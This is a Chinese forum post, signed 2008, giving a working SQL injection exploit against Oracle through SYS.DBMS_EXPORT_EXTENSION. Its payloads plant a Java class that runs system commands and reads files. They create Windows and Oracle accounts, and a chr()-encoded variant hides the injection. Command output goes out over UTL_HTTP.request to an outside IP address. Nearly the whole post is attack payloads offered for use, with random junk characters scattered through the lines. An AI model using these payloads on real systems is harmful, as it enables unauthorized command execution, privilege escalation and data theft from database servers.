以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ' q9 I8 K$ R# L+ P" B
, U3 r8 F& {& n N' X7 {
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 6 {* Y( T* T+ u( H/ p
的形式即可。(用" 'a'|| "是为了让语句返回true值) ; t n' @( D, E$ M, ^$ \
语句有点长,可能要用post提交。
/ Y4 R5 J' }: U0 @4 X% w以下是各个步骤: & |1 |' r& ?+ ^5 _. v
1.创建包 Z' V' x! i8 R$ A& K2 E+ O: S
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:: Q% o9 G% E: k1 z) P
/xxx.jsp?id=1 and '1'<>'a'||(
( y5 L$ M% U9 v4 d9 Q% Zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 l8 a! c. ^( B( v# v, v9 {4 _
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(1 ~- S; g. C( ^' J9 `
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
- d* v2 | B# r# y" f}'''';END;'';END;--','SYS',0,'1',0) from dual
$ u! x' y2 @5 D- G0 R v)
- `2 t$ M( |/ F4 B* Y------------------------
@0 P: Y# e. ]& A, K W8 P( l7 ]如果url有长度限制,可以把readFile()函数块去掉,即:
T1 H0 K( `4 m: W+ E% N& `/xxx.jsp?id=1 and '1'<>'a'||( ( ^: L( o; n: W2 A& |; o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- W' P0 p8 n6 [9 Rcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 a4 T. e, d% q/ W+ L! @ v# onew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}: L' [0 k$ i' u/ ~& D0 L; ?
}'''';END;'';END;--','SYS',0,'1',0) from dual 8 r" D5 `7 |2 G! Y/ R8 h- S* |
)
+ O. X8 L! d' j& Y1 B同时把后面步骤 提到的 对readFile()的处理语句去掉。
( _ u# |& e4 R& o5 k6 O------------------------------ ! F8 w) d- p! M/ D" A1 P
2.赋Java权限 : s* G2 {) z' y. s8 L+ u- S5 o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; L; w' f' ~6 _( G6 W7 N6 q
3.创建函数
6 o) p& F. B6 H w/ }6 Y, uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 n& R3 L% u" U1 e2 k
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual& j( N6 s5 p3 L1 o% i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: C9 p2 P: X' |( }3 q( \& Qcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual' r, y! ~* L+ ?5 l4 o; Q, }
4.赋public执行函数的权限
; I2 Y9 |8 G D& T1 ^6 z- Zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
- U: A( ~) p! Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual) t- y( p7 }* {$ z
5.测试上面的几步是否成功 3 h2 l6 n' t+ y, [: D
and '1'<>'11'||( ) }$ k- K- X6 E
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
" I; }" O! ^5 `) R9 V0 L7 z9 }0 R3 F)
0 z, B; w% {9 X$ k& X9 e9 eand '1'<>(
$ j- R* L5 ?$ X5 J _select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
0 `' W, _+ F# L) % r9 F. R4 Q- ~6 V. ?" p5 u8 _
6.执行命令:
+ L/ O" R9 I" Z J |7 e/xxx.jsp?id=1 and '1'<>(
! f0 q% r; `; R4 h5 V0 H8 }+ lselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
/ U# u+ n, v* _' B8 `& B, `! i; x b! g% Y; Y/ E- |
) 9 D8 a+ J0 f R* X1 [* Q! C
/xxx.jsp?id=1 and '1'<>( & q) {0 i: i7 H6 v- F# f
select sys.LinxReadFile('c:/boot.ini') from dual! `$ P0 |0 b7 }. R, g" H+ }
8 W% C4 }4 J' J1 z4 ]5 X9 S)0 F2 x. m; O. f6 U3 v2 [
( T& q: |4 K: [6 F9 U; P, J注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ) R$ {: Z" J; J* `2 _4 V( U
如果要查看运行结果可以用 union : : t1 }. h. n! \. i
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual" O) V2 a; ~5 ?3 W+ [
或者UTL_HTTP.request(:
+ C2 I" H8 J7 v* K5 [0 _/xxx.jsp?id=1 and '1'<>( / _ t& ^5 K8 l$ [- n1 i3 @" N0 K
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual+ y$ n' X6 s, i* a2 Z* L
) 0 q. w: h! F" @3 m# v$ r
/xxx.jsp?id=1 and '1'<>( 6 T8 k2 J1 h) t2 |9 B& G
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
# K9 Q, s. l/ y0 P; j8 h# Q) 1 {; H- f# z4 _# i# y3 w
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。( s# {/ D9 Z: A) u1 @
--------------------
! m$ o. \ w+ n3 F0 W6.内部变化
3 I5 V3 o. `1 H( H通过以下命令可以查看all_objects表达改变: 3 n* d2 r, R' J/ a& K% ?$ Z
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
8 t/ k( L J% Y+ D8 {# J" K; V7.删除我们创建的函数
. C$ S& I" M8 h) Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- b( B* E& ^- n5 C5 rdrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
L& V. q) M! f; o' W- t% k, k8 L==================================================== {* `# ^# M) U2 W6 ^
全文结束。谨以此文赠与我的朋友。
3 ^4 B5 K' q q* |: H7 Llinx ! a* T) Z$ b& B+ ^2 N; @8 v4 v' }
124829445
$ m, Z9 `2 i) J9 D( {, Y# c2008.1.12
- ]% a7 e/ C. @7 `8 ~linyujian@bjfu.edu.cn
- t+ \; S _' m, t, d5 H* J5 u1 M====================================================================== . d8 u H4 G+ Z" v
测试漏洞的另一方法:
; l& R2 z7 ~3 g: R% }, ?) U. _创建oracle帐号:
" {* _7 j8 |, l* p" D: @ `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 u) W6 x! J# l0 g. n5 E
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual& ~& g0 p1 C$ W% j: K
即: # S0 L' \4 s Y3 L- x# D- [& U( X" w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
@: K+ r6 k, v9 F# @chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ! d+ i" T6 r. ]" b* l' y
确定漏洞存在: / w3 s) ]7 R6 s! m: y! y Q9 U
1<>( - a2 Y4 s" u# `
select user_id from all_users where username='LINXSQL'
m7 p+ s9 H4 {1 O( N9 p+ Q' u) % g( d1 w; |- a* O9 u7 f' m
给linxsql连接权限:
% ~/ Z, O0 q& aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; \7 O5 M" o" h2 n5 |GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual * l. N+ ?5 S% \- E, K
删除帐号: 4 c& D! R, \: H
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! W; @' p4 U, W3 hdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
1 S6 D8 @3 j3 G3 J" C1 i====================== % Z6 \* O- v6 Q- p7 t. a
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:, U1 T4 L5 @5 y3 q" P5 L0 C0 M; `
1.jsp?id=1 and '1'<>(
( ?5 l0 I; w9 s, f6 Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 x# Z5 p* c( ^4 K, ]3 m! U
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
: O2 f- t) A1 K: o$ {) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
5 M; [% I$ r2 c! g )
$ Q0 }* t! |! y; |# u3 b+ [2 b* K3 r
7 x0 s* b8 _- m" m" U% N; V+ F8 }0 B* M
|
发表于 2012-12-18 12:21:48
收藏
支持
反对